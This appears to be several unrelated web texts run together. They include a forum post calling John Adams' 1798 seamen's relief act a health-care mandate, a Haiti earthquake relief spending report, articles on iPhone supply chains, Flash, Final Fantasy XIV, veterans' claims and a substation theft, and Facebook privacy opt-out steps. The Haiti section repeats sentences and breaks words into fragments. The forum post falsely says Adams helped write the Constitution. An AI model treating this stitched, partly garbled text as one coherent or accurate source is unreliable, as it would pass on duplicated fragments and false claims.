I just found out that in 1798 , the fifth congress passed and President John Adams signed into law " An Act for the Relief of Sick and Disabled Seamen " authorizing the creation of a marine hospital service , and mandating privately employed sailors to purchase healthcare insurance .
I guess now President John Adams was a tyran who took away Amercans ' freedom or even worse , he was a " SOCIALIST " .
I wonder if the teabaggers will now scream that President John Adams did n't know the US Constitution .
After all , he " just " help writing the US Constitution , Glenn Beck or other T - Baggers are more experts of the US Constitution than John Adams was .
You should read this article titled Our Founding Father 's Socialized Healthcare System .
As mentioned in this article , the law signed by John Adams was a federal government socialized healthcare insurance funded by a tax , that was withheld from the sailor ’s pay , and then turned over to the government by the ship ’s owner .
This legislation also created America ’s first payroll tax amounted to slightly over 1 % of the sailor ’s wages .
In fact , a ship ’s owner was required to deduct 20 cents from each sailor ’s monthly pay and forward those receipts to the service , which in turn provided injured sailors hospital care .
An injured or sick sailor would make a claim , his record of payments would be confirmed , and he would be given a " chit " for admission to the local hospital .
Some of these healthcare facilities were private , but in the larger ports Federal maritime hospitals were built .
A failure to pay or account properly was discouraged by requiring a law violating owner or ship 's captain to pay a 100 dollar fine .
Maybe instead of filing non-sense , these incompetent attorneys general should rather read or educate themselves .
It 's not unconstitutional to impose a health care Mandate .
CHAP .
LXXVII – An Act for the Relief of Sick and Disabled Seamen Section 1 .
Be it enacted by the Senate and House of Representatives of the United States of America in Congress assembled - That from and after the first day of September next , the master or owner of every ship or vessel of the United States , arriving from a foreign port into any port of the United States , shall , before such ship or vessel shall be admitted to an entry , render to the collector a true account of the number of seamen , that shall have been employed on board such vessel since she was last entered at any port in the United States , - and shall pay to the said collector , at the rate of twenty cents per month for every seaman so employed ; which sum he is hereby authorized to retain out of the wages of such seamen
Guess some folks have some issues with my title .
In my sense it was a sort of a mandate since any ship ’s owner was required to deduct 20 cents from each sailor ’s monthly pay and forward those receipts to the service , which in turn provided injured sailors hospital care .
Is n't a mandate to purchase a Healthcare Insurance when your employers is given the right to deduct a part of your pay ?
I can be wrong tho .
When a devastating earthquake in Haiti claimed a quarter of a million lives and left millions more injured and homeless , more than 25,000 donors came together to provide a total of $ 7,050,000 to Direct Relief for people in Haiti to rebuild their lives .
Haiti Earthquake Relief
Financial Summary
Backed by generous support from individuals , foundations , and businesses — Direct Relief mobilized the most comprehensive humanitarian response in its history .
Direct Relief understands that these donations were made with the sole intention of assisting people in Haiti .
In accepting donations for Haiti , Direct Relief recognizes that both donors and people in Haiti — for whose benefit the contributions were made — deserve to know , in detail , how Direct Relief used their donations .
Direct Relief has used 100 percent of Haiti - designated donations exclusively to help people affected by the earthquake in Haiti .
How Were Donations Spent ?
The $ 7 million received for Haiti - earthquake relief efforts were spent on the following activities :
$ 1.8 million to support – in the form of financial grants to organizations and health facilities in Haiti — critically needed services to help rebuild or expanding health services in earthquake - affected regions .
This includes a $ 900,000 grant to Healing Hands for Haiti , which enabled them to fit more than 1,000 patients who suffered severe injuries from the earthquake with prosthesis and provide them with long - term rehabilitation care in a newly - built , state - of - the - art rehabilitation hospital .
Healing Hands for Haiti is now training more Haitians to become rehabilitation nurses and prosthetists so that future generations of people with disabilities can be properly cared for .
to support – in the form of financial grants to organizations and health facilities in Haiti — critically needed services to help rebuild or expanding health services in earthquake - affected regions .
This includes a $ 900,000 grant to Healing Hands for Haiti , which enabled them to fit more than 1,000 patients who suffered severe injuries from the earthquake with prosthesis and provide them with long - term rehabilitation care in a newly - built , state - of - the - art rehabilitation hospital .
Healing Hands for Haiti is now training more Haitians to become rehabilitation nurses and prosthetists so that future generations of people with disabilities can be properly cared for .
$ 4.6 million to mobilize , warehouse , and deliver more than 1,700 tons of life - saving medical resources valued at more than $ 150 million ( wholesale ) to 186 community - based health facilities throughout the country ( u sing a state - of - the - art , commercial - grade IT backbone , Direct Relief created the only charitable online ordering platform for Haitian healthcare providers to efficiently order and receive medications and supplies at no cost to them . )
sing a state - of - the - art , commercial - grade IT backbone , Direct Relief created the only charitable online ordering platform for Haitian healthcare providers to efficiently order and receive medications and supplies at no cost to them . )
$ 614,938 to purchase urgently needed , specialized medical equipment and supplies requested by Haiti - based facilities and medical professionals .
Examples of Impact
Restoring sight :
More than 500 people with cataracts have the ability to see again , enabling them to work and care for their families as a result of the $ 5 million worth of state - of - the - art eye equipment and medications donated by Alcon Labs .
More than 500 people with cataracts have the ability to see again , enabling them to work and care for their families as a result of the $ 5 million worth of state - of - the - art eye equipment and medications donated by Alcon Labs .
Fighting cholera :
The IV fluids , oral re-hydration therapy , and IV tubing donated by Baxter , Hospira , Abbott , and BD have treated more than 150,000 people , or about one - fifth of the population affected by cholera .
These items have been stored in Direct Relief ’s in - country depot and are rapidly deployed within hours of a cholera outbreak and have served patients in every section of the country .
The IV fluids , oral re-hydration therapy , and IV tubing donated by Baxter , Hospira , Abbott , and BD have treated more than 150,000 people , or about one - fifth of the population affected by cholera .
These items have been stored in Direct Relief ’s in - country depot and are rapidly deployed within hours of a cholera outbreak and have served patients in every section of the country .
Protecting mothers and children during childbirth :
The provision of equipment and supplies to six maternity hospitals throughout Haiti have allowed for more than 500 cesarean sections and more than 2,000 safe deliveries since the program began in August .
Over the course of the next three years , more than 15,000 women will feel safe giving birth where Direct Relief has provided these upgrades .
The provision of equipment and supplies to six maternity hospitals throughout Haiti have allowed for more than 500 cesarean sections and more than 2,000 safe deliveries since the program began in August .
Over the course of the next three years , more than 15,000 women will feel safe giving birth where Direct Relief has provided these upgrades .
Preparing for emergencies :
At the onset of hurricane season each year , Direct Relief prepositions specifically - designed emergency medical modules throughout Haiti .
During emergencies — including cholera outbreaks and Hurricane Sandy , which devastated Haiti in 2012 — more than 40,000 people have been treated with the medications and supplies contained in the modules .
The Way Forward
More and better health services are available now to people in Haiti than before the earthquake .
Challenges persist and progress is measured , but the unwavering support from people and companies has allowed Direct Relief to build and equip new surgical facilities , ensure rehabilitation services are available to people around the clock , and give hospitals and clinics across the country access to medicine and medical supplies that can be ordered online at any time for no cost .
In addition to continuing to get the right medicines in the right hands , broadening access to rehabilitative services , bolstering emergency preparedness , and fighting acute and chronic diseases like cholera and diabetes , Direct Relief is engaged in safe - motherhood interventions to protect mothers and children during childbirth .
Haiti has the highest prevalence of maternal mortality and infant mortality in the Western Hemisphere .
Pregnancy and its complications have become the leading cause of death and disability among mothers , and 70 out of 1,000 babies die during their first year .
Direct Relief ’s interventions include expanding access to safe deliveries by training and equipping traditional birth attendants and midwives , addressing complications in birth with emergency obstetric care , and enrolling mothers into the Prevention of Maternal - to - Child Transmission of HIV program .
By targeting eight health centers strategically located in eight of the ten departments ( or states ) in Haiti , Direct Relief will reach a population of 563,000 , including approximately 60,000 pregnant women .
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
IT ’S A CELL PHONE , a camera , a media player , and a handheld computer all in one .
But what makes the iPhone such a great tech toy also makes it a perfect example of the often murky , sometimes downright sketchy origins of our electronics .
Here ’s a glimpse of what ’s really in an iPhone 3GS — and any number of other gadgets , from laptops to game consoles :
We ’ve loaded this iPhone up with 10 apps you wo n’t find on a real smart phone .
Click on an app to learn where your phone ’s electronic components really came from .
Supply Side Apple spends an estimated $ 100 on the iPhone ’s 1,000 - plus parts .
It keeps a tight lid on where in the world they come from .
If you deconstruct the gadget , you ’ll find fewer than 130 parts with a brand name or “ made in ” label on them .
Bad Apples iPhones are made in Shenzhen , China , by the Taiwanese company Foxconn , which has been criticized for its working conditions , including long hours and harsh discipline .
Apple ’s own review found that more than half its audited manufacturers did not meet its labor standards for things such as child labor .
Miner Threat A 16GB iPhone 3GS contains 12 gold - plated parts .
Producing 1 ounce of gold creates 80 tons of waste .
Layers of middlemen make it difficult to trace the source of the gold ( or any other metal ) in an iPhone , making it easy for minerals from conflict zones to slip into the supply chain .
Tantalized The iPhone includes a tantalum capacitor .
After a United Nations report linked its manufacturer , Kemet , to the illegal mineral trade in eastern Congo , the company vaguely announced it “ supports avoiding ” tantalum from the region .
Negative Charge Rechargeable batteries have energized demand for lithium .
Getting more will mean digging up 3,000 square miles of pristine Bolivian salt flats , home to one - half of the world ’s lithium reserves .
Tin Soldiers
Tin is used to solder circuit boards .
Some 27,000 tons are extracted from Congo annually , earning armed groups an estimated $ 93 million or more .
Screen Slaver
The 3.5 - inch LCD screen is reportedly made in Taiwan and China by Wintek , which faces allegations of low wages , forced overtime , and ripping off migrant workers .
BadVibes High - density tungsten is used to make cell phones vibrate .
Three - quarters of the world ’s supply comes from China — not known for its mining safety record — and 1,400 tons are dug up annually in Congo .
MicroPolluter Making a 0.07 - ounce microchip uses 66 pounds of materials , including water and toxic chemicals such as flame retardants and chlorinated solvents .
Greenpeace gives Apple a 5.1 out of 10 for its efforts to eliminate hazardous chemicals and minimize e-waste .
Editor 's Note :
We bumped this up to the front page back on April 14th , the day after the Flyers held a private screening of the new HBO documentary , " Broad Street Bullies . "
With the documentary premiering on HBO tonight at 10:00 PM ET , we 're pushing this up one more time for anybody that missed it .
Many people here have been eagerly awaiting the HBO Documentary that is set to air on May 4th , and I happened to be able to attend tonight 's screening at the Wachovia Center .
A recap of tonight 's events and a preview of what to expect from the documentary are after the jump , so stop reading now if you do n't want more info .
I 'll do my best to minimize any major spoilers that might ruin the fun .
It started with some general welcoming remarks from Ed Snider and the president of HBO Sports , who emphasized that this is the very first HBO Sports Documentary to focus on a National Hockey League topic ( to which I said under my breath " Ha ! Take that Original Six teams " , but totally meant in good fun ) .
Lauren
Hart came out to sing God Bless America , and of course they gave it the full Kate Smith duet treatment .
It was mentioned by others here a few days ago that the tradition is more about energizing the fans than the players , and to have them use it here illustrates that point .
However I 'd never seen it in person , and the atmosphere was palpable even though only a few sections of the building were used , so it definitely still has some power if the right fans are in the building .
The documentary itself was not about the entire lifespan of the organization , rather it went from the beginning to the end of the 1976 season .
It emphasized how the team bonded with the city and how the players bonded with each other as much as it covered what happened on the ice .
It also tried hard to make it clear that the team was not as one dimensional as the are painted .
The biggest highlight is a long series of hIlarious quotes and anecdotes from the players , with some particularly notable zingers from Bill Clement and Ed Van Impe ( that I wo n't repeat so that you can be surprised ) .
There was also plenty of context to help younger fans understand some traditions that still exist , among other topics .
The end of the documentary was met by an extended standing ovation from the crowd and a " Let 's go Flyers " chant .
At the end , quick appearances were made by many Bullies players , but none of them spoke .
From what I can remember , In attendance were were Bobby Clarke , Gary Dornhoefer , Bernie Parent , Larry Goodenough , Ed Van Impe , Don Saleski , Dave Schultz , and Barry Ashbee 's wife Donna ; but I know I forgot several more .
All in all it was very well made , and it seemed none in attendance were disappointed .
I hoped maybe we could schedule a viewing party to watch it together , but the air dates and times make that nearly impossible unless we are able to watch it using some form of HBO on Demand .
I hope everyone else likes it as much as my group did .
In my personal opinion it lived up to the hype very well .
Any nitpicks I had were minor and few .
Während Bundeskanzlerin Angela Merkel derzeit in Kalifornien weilt und sich dort unter anderem für die Traumfabrik Hollywood und San Francisco interessiert , widmet sich das deutsche Innenministerium an der Ostküste sicherheitspolitischen Fragen :
In Washington unterzeichneten der Staatssekretär im Bundesinnenministerium ( BMI ) , Klaus - Dieter Fritsche , und Deputy Secretary Jane Holl Lute vom U.S. Department of Homeland Security ( DHS ) am Mittwoch eine Absichtserklärung zur Verknüpfung von Grenzkontroll - Programmen beider Länder , die es biometrisch registrierten und sicherheitsüberprüften Personen erlauben , Identitätskontrollen bei Grenzübertritten an Flughäfen schneller zu durchlaufen .
In Deutschland wurde zu diesem Zweck im Jahr 2004 die " Automatisierte und Biometriegestützte Grenzkontrolle " ( ABG ) am Flughafen Frankfurt / Main eingeführt .
ABG - Teilnehmer hinterlegen im Enrollment - Center am Terminal 1 zunächst einen Referenzdatensatz ihrer Iris- Struktur und können später im Abflugbereich sogenannte Autocontrol - Spuren nutzen .
Dort weisen sie sich mit einem für ABG registrierten Personaldokument maschinell aus und authentifizieren sich zusätzlich an einem Iris - Scanner .
Eine Kontrolle durch Grenzbeamte entfällt .
BMI - Angaben zufolge haben sich bislang etwa 24.500 Personen für das Verfahren der automatisierten und biometriegestützten Grenzkontrolle angemeldet .
Das korrespondierende Verfahren in den USA trägt den Namen " Global Entry " und wird von der U.S Customs and Border Protection ( CBP ) betreut .
Voraussetzung für eine Teilnahme ist hier eine Registrierung der Fingerabdrücke ; zudem werden ein persönliches Gespräch und eine Sicherheitsüberprüfung durchgeführt .
Wer für Global Entry zugelassen wird , kann die Passkontrolle an zahlreichen Flughäfen in den USA an einem " Global Entry Kiosk " selbst durchführen .
Laut dem Department of Homeland Security haben sich seit Einführung des Programms im Jahr 2008 mehr als 42.000 Teilnehmer in den USA dafür registriert .
Seit Mai 2009 ist die Nutzung des Systems auch für Niederländer möglich , die am Privium - Programm ( Iris - Check ) teilnehmen .
" Eine Verknüpfung unserer biometrischen Programme für überprüfte Reisende mit den entsprechenden Programmen Deutschlands wird den rechtmäßigen Handel und Reisen zwischen unseren beiden Ländern vereinfachen und gleichzeitig der Polizei ermöglichen , sich auf die wichtigsten Sicherheitsrisiken an den Grenzübergängen in unserem Land zu konzentrieren " , sagte die stellvertretende Heimatschutzministerin Lute .
Staatssekretär Fritsche , früher Vizepräsident des Bundesamtes für Verfassungsschutz und anschließend Geheimdienstkoordinator im Bundeskanzleramt , führte aus , dass das gemeinsame Programm den transatlantischen Luftverkehr erleichtere und ihn " gleichzeitig sicherer " mache .
( pmz )
There 's no official transcript yet , but the Wall Street Journal just live - blogged an interview with Adobe CEO Shantanu Narayen , in which he responded to the Steve Jobs " Thoughts on Flash " letter posted this morning .
Substantively , Narayen did n't offer much we have n't heard Adobe say before , but his frustration with Apple is palpable even in summary form : he called Jobs ' points a " smokescreen , " said Flash is an " open specification , " and further said Apple 's restrictions are " cumbersome " to developers and have " nothing to do with technology . "
What 's more , he also said Jobs ' claims about Flash affecting battery life are " patently false , " and suggested that any Flash - related crashes on OS X have more to do with Apple 's operating system than Adobe 's software .
Perhaps most importantly , Narayen reiterated that Adobe is fundamentally about making it easier for devs to write multiplatform tools -- a stance Jobs specifically took issue with in his letter , saying multiplatform tools lead to bad user experiences .
Apple and Adobe and the rest of us can argue about battery life and performance all night , but that 's clearly the central philosophical difference between these two companies , and we doubt it 's ever going to change .
That is , unless Adobe absolutely kills it with Flash 10.1 on Android 2.2 -- and given our experiences with Flash on smartphones and netbooks thus far , we 'll be honest when we say that 's going to be a major challenge .
We 'll link over to the full transcript when it goes up , but for now , hit the source link for the liveblog .
Update :
We 've now embedded video of the interview for you after the break .
Much better than a transcript , do n't you think ?
Dengeki magazine was lucky enough to get a shot at the alpha build for Final Fantasy XIV .
They printed most of the information we saw yesterday in Famitsu , but also got some time to sit down with Producer Hiromichi Tanaka and Director Nobuaki Komoto !
Together , they discussed details of the alpha and plans for the progression of beta testing .
Check out the details below .
Discuss this in the ZAM Forums !
- When Final Fantasy XI first started , it began with a beta test .
Why did you decide to go back even further this time and start with an alpha ?
Komoto :
At the beta stage , a game is relatively complete .
In order to better take in user opinions and make more adjustments , we wanted users to see an earlier version and let their feedback affect the direction of the game itself .
- So , does that mean there could be some dramatic changes after the alpha version ?
Komoto :
Yes , there could .
We 're already wondering ourselves what shape the game will take after the alpha testing is complete .
There are issues we have seen arise , and we want to think of how to best fix these and add in user suggestions at the same time .
Tanaka :
For the alpha test , we only have one World .
The idea is we first test that World for stability and then in phase 1 of the beta test , we begin to add more Worlds and collect as much data as we can .
- Will the amount of playable cities increase in the beta phase ?
Tanaka :
More than simply increasing the play area , we want to test and adjust the core mechanics of the game .
For example , we want to see if leveling up works properly or if attaining a new skill rank works properly .
Our number one priority is to monitor these things closely .
Komoto :
Just like how we set a limit to the levels , we want to place benchmarks and see if they can be reached without major issues .
We expand the system a bit , and then sample data from within those constraints .
Tanaka :
We want to examine the speed at which people grow , as well as the core game mechanics , and see if we need to make any adjustments .
- So , then it sounds like we wo n't really get the full game until the official release version .
Komoto :
We think the full scope of the game will come together sometime during the beta phase .
Tanaka :
The game system will be completed during the beta phase , but I would say you probably wo n't see the entirety of what the game world has to offer until the official release .
- I got to try out the Guildleve system , and it feels like a great way to manage your play time .
You can complete a quest within 30 minutes and then start a new one right away .
It feels like Assault in FFXI , where you can enjoy some casual challenges divided into easy to manage chunks .
Forgive me if I 'm wrong , but it feels like a system really designed around light , casual play .
Komoto :
That 's true , but I would n't say it 's just a system for light play .
What we wanted to do is design something that casual players could enjoy .
That entails making it simple and easy at first .
However , while the rules are simple early on , future quests add more rules and more variations to Guildleve while at the same time putting players up against tougher monsters .
That 's the kind of system we 're considering .
- As for character growth , it appears there are Skill Ranks for each Class and Physical Levels for the avatar itself .
Physical Levels are where you can freely spend points on different parameters , right ?
Komoto :
In the alpha , there is a cap on Physical Levels , and you can't redistribute points already spent on parameters just yet .
Later on , we want to allow players to reallocate points in case they focus too heavily on a certain attribute and want to adjust that .
We also plan to make it so you cannot simply max out every attribute , so players will have to work to find a good balance .
For example , you may raise a certain skill in order to play a Warrior - type class .
If you later want to go as a Disciple of Magic , you can then reallocate those points into something more beneficial for a magic - user .
- Regarding character customization , will there be any limitations on attaching skills from one Class onto another ?
Komoto :
If we can , we want to allow players to use skills from other Classes on their current one .
However , there are many things to test out regarding this , such as how the effects of skills will be weakened when used with other Classes .
For example , maybe a certain combination of skills does n't work well together , or perhaps another combination is too powerful -- we want to maintain game balance as we go forward .
There will , of course , also be some skills that we simply wo n't allow to be attached to other Classes .
At this stage , we are still looking to see how things work , so feel free to try out any combinations you wish .
- With FFXI and Support Jobs , there was a limitation , and in general you wanted users to play Jobs a certain way , which made it easy for other players to pick up on what that Job 's role was .
If you can freely set abilities on different Classes and freely boost your parameters , will that make it difficult for players to define roles for Classes ?
Komoto :
That 's why we feel it is most important to have Classes defined by their main skills .
Although there is wiggle room for adding other abilities , a Class that excels at tanking will usually be considered a tank first and foremost .
From that starting point , you can begin to fine - tune your role based on the situation and see how your Class works with other Classes .
- How are crafting skills coming along at this point in the alpha ?
Komoto :
We 've touched on them so far and let players get the basics of cultivating materials , but we 're still seeing how the system will take shape .
We plan to have players able to gather materials in field areas and are preparing Guildleves that involve cultivation and harvesting .
However , we 're still in the testing phase for these aspects of crafting .
Also , we 're going to make skills for harvesting and crafting and want to make the whole experience fun for players .
Fighting battles is fun , but we hope to create a game where players can have just as much as crafters -- raising skills , going on adventures , and even completing storylines .
Guildleves should be very useful for making this happen .
- How many different types of Guildleves are there in the alpha version ?
Komoto :
Not so many .
A little less than 20 .
- Will players be able to solo even some high - level Guildleves ?
Komoto :
We hope to allow that by use of the selectable difficulty levels .
That is n't to say there wo n't be any party - related Guildleves , but we want to allow solo players to enjoy Guildleve as much as possible .
- Speaking of which , is 6 members the average party size ?
Komoto :
This time , we 've set the maximum for parties at 15 members -- almost the size of an alliance .
However , they are n't divided into units .
A party of 3 is fine , a party of 8 is fine , and we do n't want to impose any standards from our end .
Instead of forcing minimum party sizes on players , we want to allow them to freedom to put together any group they wish .
- I was surprised to see that Teleport and Warp were available to every Class right from the start !
Komoto :
There will be costs attached to those abilities , but that has n't been implemented yet in the alpha .
We hope to make it so players with limited time can travel quickly , but also add elements that players with time to spare can enjoy if they decide to travel back on foot .
We are looking to provide enough warp points to make these abilities a real help for players short on time .
As for costs involved , we do n't plan anything really restricting , and hope to keep it down to almost nothing .
- The range of motion for avatars was astounding .
Lalafell are especially cute .
Komoto :
They 're sickeningly cute , are n't they ?
( laughs )
This time around , the amount of motions and equipment and everything has been expanded extensively .
Then there 's the facial improvements .
- The facial expressions are amazing .
Characters in cut scenes are so expressive and have voices , too .
Compared with current MMOs , especially FFXI , the world of FFXIV just draws you in completely .
Komoto : I had that same feeling when viewing the cut scenes myself .
- The alpha only supports Windows , but will the beta phase add support for PS3 ?
Tanaka :
We may not make it in time for phase 1 of the beta , but around phase 2 of the beta we believe we will be able to support PS3 .
- How long do you plan to run the alpha and stage 1 and 2 of the beta ?
Are you just seeing how things go and playing it by ear ?
Tanaka :
Things may change as the product we are making changes through testing .
The alpha and phase 1 of the beta will be pretty similar .
Phase 2 of the beta is where the game will begin to change based on the feedback collected from the alpha .
- Will phase 1 of the beta add more Worlds than the alpha ?
Will any of the feedback from the alpha influence the initial beta stage ?
Tanaka :
Between the alpha and phase 1 of the beta , we do n't expect much to change at all .
Phase 2 of the beta and onward will see the game get updated and become vastly different .
Komoto :
More than a set length for each phase , I would say it 's how many stages we need .
× 1 of 3 Expand Photo by Rex Miller Army veteran David Best has turned to the Veterans Law Project for help .
× 2 of 3 Expand Photo by Rex Miller Army veteran David Best 's claim is still in limbo .
× 3 of 3 Expand Photo by Lisa Sorg Craig Kabatchnick , a former VA attorney , now advocates for veterans .
Prev Next
As an Army soldier during the Vietnam War , David Best patrolled Korea 's demilitarized zone , lugging a 40 - pound pack on his back in temperatures as bone - chilling as 20 degrees below zero and as smoldering as 100 .
During his service , Best developed an intermittent pain in his left knee , which radiated to his thigh and groin .
" It felt like someone was stabbing me with a knife . "
After his discharge in 1969 , he worked for the post office , and the pain would strike so acutely that his leg would fold and he'd crumble to the floor .
" I would tremble from the pain , " says Best , now 58 .
" And girls would scream . "
Military and Veterans Administration doctors took X - rays of his knee , all negative .
Had they probed further , they might have discovered the root of Best 's pain .
In 1989 , a private doctor finally diagnosed him with degenerative arthritis of the left hip .
It had developed while he was in the service more than 20 years earlier as the result of an improper fit between the hip joint and its socket .
Disguised as referred knee and groin pain , the arthritis was exacerbated by the heavy load he carried as a patrolman .
Since 1997 , Best has battled the Veterans Administration for compensation benefits , which he says now total $ 300,000 .
And for 10 years , the VA has denied him .
The case remains on appeal .
Best is one of 378,000 veterans mired in a backlog of pending claims and a system riddled with inconsistent and inaccurate benefits rulings , according to a report issued this month by the Government Accountability Office .
It calls for a " fundamental reform of the VA 's disability compensation program , " adding that disability decisions are based on criteria written in 1945 .
The problem is even worse , says attorney Craig Kabatchnick , who was the senior appellate attorney for the VA 's Office of General Counsel from 1990 - 95 .
" Our job was to deny claims , " he says .
" We celebrated beating veterans , especially those representing themselves . "
There was no official policy , he says , but ranking attorneys instructed staff to fight and deny caseseven though the law mandated that they give veterans the benefit of the doubt .
Kabatchnick is now the supervising attorney for the Veterans Law Project , a new legal clinic at N.C. Central University , where he and 19 students from NCCU and UNC - Chapel Hill are defending veterans and preparing their claims and appeals for free .
In North Carolina , veterans ' fates lie at the VA Regional Office in Winston - Salem , where ratings officers , guided by a 182 - page book , determine if a claim should be granted , and if so , at what percentage of disability , ranging from 0 to 100 .
The disability rating determines veterans ' monthly pay .
Yet , ratings officers are under tremendous pressure to process claims .
In a federal survey , ratings officers indicated that productivity demands , high turnover , training and frivolous claims prevented them from adequately doing their jobs .
" They get a stack of cases every day and are told to adjudicate them even if a file is thousands of pages thick , " says Kabatchnick .
" And it 's easier to deny than grant .
You have to present evidence to grant , but for denial you can just write ' insufficient evidence . ' "
If a claim is denied , the veteran receives a letter explaining why ; he or she can then appeal to the Board of Veterans Appeals .
That decision can take at least a year .
" More often than not , it 's denial , " Kabatchnick says .
The Office of General Counsel did n't respond to requests for comment by deadline .
In Best 's case , some of his military records are missing from the VA .
It has denied his claim three times , requesting additional medical records and arguing that his hip arthritis is n't service - connected because he did n't complain of hip pain as a soldier .
However , Best 's doctor says the knee and groin pain are symptomatic of hip arthritis ; the law states that symptoms arising during service and continuing after a veterans ' discharge can be compensated .
Further complicating matters is a Civil War -era law prohibiting veterans from paying lawyers more than $ 10 to represent them until their case reaches its final appeal before the court .
Few attorneys will work for that amount .
For Best , it does n't even cover the cost of copying his 300 - page medical file .
So veterans usually hire service officers , known as VSOs , who work for service organizations such as the American Legion and Disabled American Veterans or county veterans ' offices .
In June , a new law will partially lift that 140 - year - old ban and allow veterans to hire attorneys to represent them before the Board of Veterans Appeals .
But the law , which passed in December as part of a larger veterans bill , still does n't allow them to get legal help when preparing their initial claim .
The law has caused tension between VSOs and lawyersand veterans are caught in the middle .
The American Legion and some state and county officials say they support veterans hiring attorneys if there is a fee cap .
The law limits attorney 's fees to 20 percent of past due benefits .
" We 'll take any assistance we can get for vets , " says Charlie Smith , the assistant secretary at the N.C. Division of Veterans Affairs , which offers services to North Carolina 's estimated 790,000 veterans .
" But I 've also heard from attorneys who say they do n't have time to learn the procedures of the VA . "
Kabatchnick argues that many VSOs are n't qualified to interpret difficult medical / legal case law .
A consultant 's report to the VA last year suggested that to improve the quality of claims , the VA should have stricter accreditation requirements for VSOs .
Last year , former Chief Judge of the Court of Veterans Appeals Frank Nebeker wrote a letter to the House Veterans ' Affairs Committee contending the VA system " demeans veterans " by prohibiting them from hiring attorneys , adding that if claims had been handled by lawyers , they would move through the system more quickly .
Service organizations adamantly defend VSOs and their work , saying they are well - trained and have slightly better success rates before the appeals board .
" Just because a person is an attorney does n't make him an expert in VA law , " says Steve Smithson , an American Legion spokesman .
" The bottom line is , there 's enough work to go around for everybody . "
The DAV also contends that involving attorneys ignores Congress ' intent that there be an " open , helpful and pro-veteran " relationship between the VA and veterans .
Yet , that relationship is actually more akin to a battle than a détente .
Veterans have a " general frustration and distrust of the system , " a recent federal survey showed .
The claims process is confusing , and the appeals gauntlet , combative .
" I was under orders to fight the cases , " Kabatchnick says .
Moreover , critics charge that attorneys are merely trolling for profits , eyeing the thousands of future Iraq and Afghanistan war veterans who will apply for benefits .
" The problem with attorneys is greed gets in the way , " says Lou Washington , director of Durham County Veterans Services .
" Vets need the money . "
They also need someone to count on .
Best says the Fayetteville office of the state 's Division of Veterans Affairs hired a VSO from the American Legion to represent him before the Board of Veterans Appeals .
Yet , when Best arrived in Washington , D.C. , for his hearing , his medical records were there , but his VSO was a no - show .
Best represented himself , and the judge sent his case back to the VA Regional Office , where it sat for nearly three years .
Properly developing the claim is crucial and often determines if a veteran receives benefits or if the case lands in VA limbo .
By law , the VA is responsible for telling the vet what evidence is necessary to win the claim and for gathering military medical records ; the veteran collects any private medical files .
Kabatchnick says the VA is n't fulfilling its duties , and the GAO agrees , stating regional offices are inconsistent in following the law .
Best has turned to the Veterans Law Project for help , and Kabatchnick has taken up his case .
For Kabatchnick , who also works at the Durham law firm Everett & Everett , the project is a turnabout from his former life .
" I left [ the Office of General Counsel ] because I did n't like the way vets were being treated , " he says .
" My dad did military law and he said , ' How can you sleep at night ?
How can you deny these guys benefits ? ' "
Meanwhile , doctors replaced Best 's left hip in 1997 ; his right hip , arthritic from uneven wear , was replaced in 2002 .
He still limps , but the pain is gone , Best says .
His claim remains in limbo .
" I feel like the VA is waiting for us veterans to die . "
A man suspected of trying to steal metal from a South Yorkshire power station received " horrific burns " when exposed to 66,000 volts of electricity .
Police said the 21 - year - old broke into an electrical substation on Green Lane in Thurcroft on Saturday evening .
The local man received serious burns to his head , chest and arms after touching wiring .
He was taken to Sheffield 's Northern General Hospital where his condition is described as serious but stable .
' Charred bodies '
South Yorkshire Police said that the gate into the substation compound had been forced and metal piping had been removed .
Peter McCormick of CE Electric UK , the company that owns the electricity distribution network in Yorkshire , said : " The perpetrator has received an excruciating electric shock and has been left with horrific burns .
" He is extremely lucky to be alive .
" To the untrained and uninitiated , substations are potentially fatal and in the past our staff have discovered charred bodies in substations after similar incidents . "
He added that substation break - ins can cause up to 30,000 properties to be left without electricity .
" It 's bad enough that this individual has put his own life on the line , but the total lack of concern for the safety of others is unforgivable , " Mr McCormick said .
Update 2 : On May 26 , Facebook launched new privacy controls , which will be rolled out to users over a few weeks .
These instructions are for the old controls .
If you have received the new controls , please use our revised instructions .
Update : Friday morning Facebook changed its privacy settings layout , making it a bit more challenging to opt out completely .
As before , unchecking the " Allow " box is not sufficient because you need to block each Instant Personalization website to fully opt out .
However , the previous path ( via " Learn More " ) to the necessary Block Application buttons was removed , with Facebook suggesting instead you first go to the sites ( at which point your information is disclosed ) , and then click " ' No Thanks ' on the blue Facebook notification on the top of partner sites . "
To fully opt out , you need to :
Go to the Instant Personalization privacy setting and uncheck the " Allow " button .
Click confirm .
Come back to this page .
Go to the page for Microsoft Docs , click Block Application on the page , click Block Application on the pop-up , and click Okay on the next pop-up .
Come back to this page .
Go to the page for Pandora , click Block Application on the page , click Block Application on the pop-up , and click Okay on the next pop-up .
Come back to this page .
Go to the page for Yelp , click Block Application on the page , click Block Application on the pop-up , and click Okay on the next pop-up .
Come back to this page .
Optional : Go to the Facebook Site Governance page , and express your opinion in a comment .
Here is the updated video :
%3Cobject%20 width%3D%22480%22%20height%3D%22373%22%20allow%3D%22autoplay%22%3E%3Cparam%20name%3D%22movie%22%20value%3D%22https%3A%2F%2Fwww.youtube-nocookie.com%2Fv%2FSJkoyrPFaXE%26amp%3Bhl%3Den_US%26amp%3Bfs%3D1%26amp%3Brel%3D0%3Fautoplay%3D1%26mute%3D1%22%20%2F%3E%3Cparam%20name%3D%22allowFullScreen%22%20value%3D%22true%22%20%2F%3E%3Cparam%20name%3D%22allowscriptaccess%22%20value%3D%22always%22%20%2F%3E%3Cembed%20src%3D%22https%3A%2F%2Fwww.youtube-nocookie.com%2Fv%2FSJkoyrPFaXE%26amp%3Bhl%3Den_US%26amp%3Bfs%3D1%26amp%3Brel%3D0%3Fautoplay%3D1%26mute%3D1%22%20type%3D%22application%2Fx-shockwave-flash%22%20allowscriptaccess%3D%22always%22%20allowfullscreen%3D%22true%22%20width%3D%22480%22%20height%3D%22373%22%20allow%3D%22autoplay%22%3E%3C%2Fembed%3E%3C%2Fobject%3E
Privacy info .
This embed will serve content from youtube - nocookie.com
Original Post :
Yesterday , Facebook announced Instant Personalization , whereby select websites would " personalize your experience using your public Facebook information . "
The initial sites are Pandora , Yelp and Microsoft Docs .
As Facebook CEO Mark Zuckerberg explained , this means that when you visit " Pandora for the first time , it can immediately start playing songs from bands you 've liked . "
Pandora , and other partners , can also link your real name and other Facebook information with everything you do on their site .
More specifically , these sites " may access any information you have made visible to Everyone ... as well as your publicly available information .
